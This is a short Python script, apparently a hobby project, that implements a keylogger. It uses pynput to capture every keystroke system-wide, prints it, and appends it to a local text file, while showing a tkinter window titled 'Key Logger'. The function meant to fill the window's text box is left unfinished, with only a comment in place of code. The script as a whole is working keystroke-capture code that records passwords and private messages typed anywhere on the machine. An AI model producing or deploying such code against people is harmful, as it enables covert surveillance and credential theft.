from pynput import keyboard
import tkinter as tk

def keyPressed(key):
    # Print the key press in the terminal
    print(str(key))
    
    # Log the key press in the text file
    with open("keyfile.txt", 'a') as logKey:
        try:
            char = key.char
            logKey.write(char)
        except:
            logKey.write(" [Special Key] ")
    
    # Insert the key press into the text box in the window
    

if __name__ == "__main__":
    # Set up the tkinter window
    root = tk.Tk()
    root.title("Key Logger")

    # Create a text box
    text_box = tk.Text(root, height=10, width=50)
    text_box.pack()

    # Start the key listener
    listener = keyboard.Listener(on_press=keyPressed)
    listener.start()

    # Run the tkinter event loop
    root.mainloop()
